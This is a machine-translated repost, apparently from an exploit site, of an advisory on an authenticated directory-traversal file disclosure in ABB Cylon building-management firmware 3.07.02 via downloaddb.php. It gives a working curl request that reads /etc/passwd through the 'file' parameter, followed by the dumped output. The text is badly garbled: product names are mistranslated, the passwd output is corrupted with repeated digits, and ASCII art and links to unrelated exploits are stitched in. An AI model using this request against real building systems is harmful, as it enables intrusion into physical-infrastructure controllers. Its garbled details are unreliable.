ABB CYLON方面3.07.02-文件披露（认证）

[HackApt-37 Team已验证会员]

ABB CYLON FOEXS 3.07.02（downloaddb.php）身份验证的文件披露
Vendor: ABB Ltd.
产品网页: https://www.global.abb
受影响的版本: Nexus系列，Matrix-2系列，方面- 企业，方面- 企业
固件:=3.07.02
摘要:是屡获殊荣的可扩展建筑能源管理
和旨在允许用户无缝访问其的控制解决方案
通过包括智能设备在内的标准建筑协议来构建数据。
DESC:建筑物管理系统遭受认证的任意验证
文件披露漏洞。输入通过“文件”获取参数
在使用之前，通过“ downloaddb.php”脚本未正确验证
下载数据库文件。可以利用这来披露
通过目录遍历攻击，任意和敏感的文件。
在: GNU/Linux 3.15.10（ARMV7L）上测试
gnu/linux 3.10.0（x86_64）
GNU/Linux 2.6.32（x86_64）
英特尔（R）原子（TM）处理器E3930 @ 1.30GHz
英特尔（R）Xeon（r）银4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
extackft自动化应用程序服务器
LightTPD/1.4.32
LightTPD/1.4.18
Apache/2.2.15（CentOS）
OpenJDK运行时环境（RHEL-2.6.22.1.-x86_64）
OpenJDK 64位服务器VM（构建24.261-B02，混合模式）
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5831
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5831.PHP
21.04.2024
- -
$ CAT项目
项目
。|
| |
|'| ._____
___ | | |。 |' 。----'|
_ .-'' - 。 | | 。--'| | | | _ | |
.-'| 。| | || ' - _ | | | | | | | |
|' | | | | | | | | | | | | | | | | | | | | | |
__ | ' - '''' - '' - 。 ``| __
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓███████▓▒░░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████████▒░▒▓██████▒░░▒▓████████████▒░▒▓██████▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░░▒▓█▓▒░░░░░░░░▒▓██████▓▒░
$ curl'http://192.168.73.31/downloaddb.php？file=././././././././././././etc/etc/etc passwd'\
-h'cookie: phpsessid=xxx'
root:x3:033333:root:/home/home/root:/bin/sh
DAEMON:X3:1:13360DAEMON:/USR/SBIN:/bin/sh
BIN:X3:233333333333333:/bin:/bin/sh
SYS:X3333333333333:SYS:/dev:/bin/sh
Sync:x3:4:65343:Sync:/bin3:/bin/sync
Games:x3:5:60603360games:/usr/gashs:/bin/sh
MAN:X3:6:123360MAN3:/var/cache/man:/bin/sh
LP:X333333333333:LP:/var/spool/lpd:/bin/sh
Mail:x3:8:83360mail:/var/mail:/bin/sh
news:x:9:93360news:/var/spool/news:/bin/sh
Uucp:x:10333333:uucp:/var/spool/uucp:/bin/sh
PROXY:X33333333333333ROXY:/BIN3:/bin/sh
www-data:x333333333333333333:wwwwwww-data:/var/var/www3:/bin/sh
Backup:x3:33333333:backup:/var/backups:/bin/sh
List:x33333333333333:Mailing List Manager:/var/list:/bin/sh
IRC3:x333339333339333333333:/var/run/run/ircd:/bin/sh
GNATS:X33:413:41:GNATS错误报告系统（Admin）:/var/lib/lib/gnats:/bin/sh/sh
NOONOY:X33:653333333333333343:NOBODY:/none existent:/bin/sh
MessageBus:x3:99999999998333333333333:/var/lib/dbus:/bin/false
Systemd-Journal-Gateway:x3:9983333333333333333333333:/home/home/home/systemd-journal-gateway:
AVAHI:X33333333333333333333:/var/run/run/avahi-daemon3:/bin/false
avahi-autoipd:x:996:993:99:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
SSHD:X3:995333333333333333333333:/var/run/run/sshd:/bin/false
XUSER:X33:1000:1000333333:/HOME/XUSER:0
PPP:X33:9433333333334333333:/dev/null3:/usr/sbin/ppp-dialin
MySQL:x333333333333333333333433333:/var/mysql:0
AAMTECH3:X3333333333333333333333:/home/aamtech:/bin/sh

 

H

Ollama 0.6.4-服务器端请求伪造（SSRF）

H

Webmin Usermin 2.100-用户名枚举